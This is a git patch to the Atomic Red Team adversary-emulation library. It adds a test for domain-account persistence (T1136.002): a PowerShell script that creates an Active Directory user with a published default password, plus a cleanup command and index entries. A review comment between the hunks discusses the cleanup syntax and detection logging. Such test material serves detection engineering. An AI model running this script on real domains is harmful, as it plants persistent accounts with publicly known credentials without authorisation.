From 43bda07d491ab8579fbe95a85cdb0c65bad59df3 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 11 Feb 2021 17:19:00 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 37 ++++++++++++++
 atomics/T1136.002/T1136.002.md | 48 +++++++++++++++++++
 6 files changed, 89 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 99e74211..587975b9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -125,6 +125,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index cc4d262a..036c16ce 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -348,6 +348,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1d2baaf6..a5b8b9cf 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -249,6 +249,7 @@
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
 - Atomic Test #1: Create a new Windows domain admin user [windows]
 - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+ - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e790f09c..de725c5f 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -630,6 +630,7 @@
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
 - Atomic Test #1: Create a new Windows domain admin user [windows]
 - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+ - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e79f7cb0..acdfb3e2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -11752,6 +11752,43 @@ persistence:
 '
 name: command_prompt
 elevation_required: false
+ - name: Create a new Domain Account using PowerShell
+ auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
+ description: 'Creates a new Domain User using the credentials of the Current
+ User
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ username:
+ description: Name of the Account to be created
+ type: String
+ default: T1136.002_Admin
+ password:
+ description: Password of the Account to be created
+ type: String
+ default: T1136_pass123!
+ executor:
+ command: |
+ $SamAccountName = '#{username}'
+ $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+ Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+ $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+ $User.SamAccountName = $SamAccountName
+ $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+ $User.SetPassword($TempCred.GetNetworkCredential().Password)
+ $User.Enabled = $True
+ $User.PasswordNotRequired = $False
+ $User.DisplayName = $SamAccountName
+ $User.Save()
+ $User
+ cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+
+'
+ name: powershell
+ elevation_required: false
 T1078.002:
 technique:
 external_references:
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index c3029be0..cf70f9c5 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
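Review bot: The cleanup_command added in this index.yaml hunk, `net user "#{username}" >nul 2>&1 /del /domain`, is the cmd.exe form carried over from tests #1 and #2, but this test's executor is `powershell`, where `>nul` names a file path and silences output only insofar as Windows maps that path to the NUL device; if silencing is wanted the executor-native form is `net user "#{username}" /del /domain *>$null`, though because the default password is published with the test, a run whose cleanup fails leaves a domain account with a publicly known credential, so letting the `net user` result surface is the better choice (the same lines appear in the T1136.002.md hunk below). In the attack command, the ConvertTo-SecureString → PSCredential → GetNetworkCredential().Password chain only reproduces the plaintext `#{password}`, so `$User.SetPassword('#{password}')` does the same work in one line and drops the `$AccountPassword` and `$TempCred` locals. The description should also state that the calling user needs account-creation rights in the domain, since `elevation_required: false` speaks only to local elevation; a `dependencies` entry whose `prereq_command` checks domain membership would make that prerequisite enforceable. On the detection side, the created account is logged on the domain controller as a user-account-creation event regardless of which executor issued the call, so the `powershell` executor name in the index entries does not change what defenders monitor for.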
@@ -10,6 +10,8 @@ Such accounts may be used to establish secondary credentialed access that do not
 - [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon)
+- [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell)
+
@@ -80,4 +82,50 @@ net user "#{username}" >nul 2>&1 /del /domain
+
+
+
+## Atomic Test #3 - Create a new Domain Account using PowerShell
+Creates a new Domain User using the credentials of the Current User
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Name of the Account to be created | String | T1136.002_Admin|
+| password | Password of the Account to be created | String | T1136_pass123!|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$SamAccountName = '#{username}'
+$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+$User.SamAccountName = $SamAccountName
+$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+$User.SetPassword($TempCred.GetNetworkCredential().Password)
+$User.Enabled = $True
+$User.PasswordNotRequired = $False
+$User.DisplayName = $SamAccountName
+$User.Save()
+$User
+```
+
+#### Cleanup Commands:
+```powershell
+net user "#{username}" >nul 2>&1 /del /domain
+```
+
+
+
+
+